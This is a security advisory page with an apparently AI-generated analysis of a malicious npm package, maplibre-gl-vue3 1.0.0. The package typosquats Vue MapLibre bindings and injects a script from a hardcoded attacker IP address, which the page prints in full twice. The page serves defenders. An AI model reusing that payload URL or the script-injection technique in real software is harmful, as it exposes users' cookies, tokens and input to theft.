MAL-2026-6592: Malicious code in maplibre-gl-vue3 (npm)
The npm package maplibre-gl-vue3 version 1.0.0 contains malicious code that injects a script tag into the document head, loading attacker-controlled JavaScript from an unencrypted, hardcoded IP address. This script can access sensitive browser data such as cookies, localStorage, session tokens, and user input in any Vue 3 application that imports this package. The package name closely resembles legitimate Vue bindings for MapLibre GL, increasing the risk of accidental installation.
AI Analysis
Technical Summary
The maplibre-gl-vue3 npm package (version 1.0.0) advertises itself as Vue 3 bindings for MapLibre GL but includes malicious behavior by unconditionally injecting a <script> tag pointing to a hardcoded HTTP endpoint (http://121.199.166.250:19527/myApi/pipesnetwork.js) into the document head upon import. This endpoint serves attacker-controlled JavaScript, enabling full access to browser-stored sensitive data within the host application. The script loader is unpinned, served over plaintext HTTP, and unrelated to the package's stated mapping functionality. A source comment suggests the script URL was intended to be replaced before release, indicating this is likely a supply chain compromise. The package name shadows the legitimate vue-maplibre-gl package, increasing the likelihood of accidental usage.
Potential Impact
Any Vue 3 application importing maplibre-gl-vue3 version 1.0.0 will execute attacker-controlled JavaScript in the browser context, potentially exposing cookies, localStorage, session tokens, and user input to the attacker. This compromises user data confidentiality and application integrity. The use of an unencrypted HTTP endpoint allows for interception and modification of the malicious script in transit.
Mitigation Recommendations
No official patch or remediation is currently available for maplibre-gl-vue3 version 1.0.0. Users should avoid installing or using this package. Instead, use the legitimate vue-maplibre-gl package for Vue 3 bindings to MapLibre GL. Monitor vendor advisories for updates or official fixes. Since this is a malicious package, removing it from projects and dependency trees is critical.
MAL-2026-6592: Malicious code in maplibre-gl-vue3 (npm)
Description
The npm package maplibre-gl-vue3 version 1.0.0 contains malicious code that injects a script tag into the document head, loading attacker-controlled JavaScript from an unencrypted, hardcoded IP address. This script can access sensitive browser data such as cookies, localStorage, session tokens, and user input in any Vue 3 application that imports this package. The package name closely resembles legitimate Vue bindings for MapLibre GL, increasing the risk of accidental installation.
Affected software
Run on your own infrastructure? Check whether these packages are installed with threat-finder — our free open-source scanner.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The maplibre-gl-vue3 npm package (version 1.0.0) advertises itself as Vue 3 bindings for MapLibre GL but includes malicious behavior by unconditionally injecting a <script> tag pointing to a hardcoded HTTP endpoint (http://121.199.166.250:19527/myApi/pipesnetwork.js) into the document head upon import. This endpoint serves attacker-controlled JavaScript, enabling full access to browser-stored sensitive data within the host application. The script loader is unpinned, served over plaintext HTTP, and unrelated to the package's stated mapping functionality. A source comment suggests the script URL was intended to be replaced before release, indicating this is likely a supply chain compromise. The package name shadows the legitimate vue-maplibre-gl package, increasing the likelihood of accidental usage.
Potential Impact
Any Vue 3 application importing maplibre-gl-vue3 version 1.0.0 will execute attacker-controlled JavaScript in the browser context, potentially exposing cookies, localStorage, session tokens, and user input to the attacker. This compromises user data confidentiality and application integrity. The use of an unencrypted HTTP endpoint allows for interception and modification of the malicious script in transit.
Mitigation Recommendations
No official patch or remediation is currently available for maplibre-gl-vue3 version 1.0.0. Users should avoid installing or using this package. Instead, use the legitimate vue-maplibre-gl package for Vue 3 bindings to MapLibre GL. Monitor vendor advisories for updates or official fixes. Since this is a malicious package, removing it from projects and dependency trees is critical.
Technical Details
- Gcve Source
- db.gcve.eu
- Osv Id
- MAL-2026-6592
- Osv Schema Version
- 1.7.4
- Aliases
- []
- Ecosystems
- ["npm"]
- Database Specific Severity
- null
- Cvss Version
- null
Threat ID: 6a42ed6527e9c79719937db9
Added to database: 06/29/2026, 22:10:45 UTC
Last enriched: 06/29/2026, 22:34:08 UTC
Last updated: 06/30/2026, 00:43:41 UTC
Views: 3
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.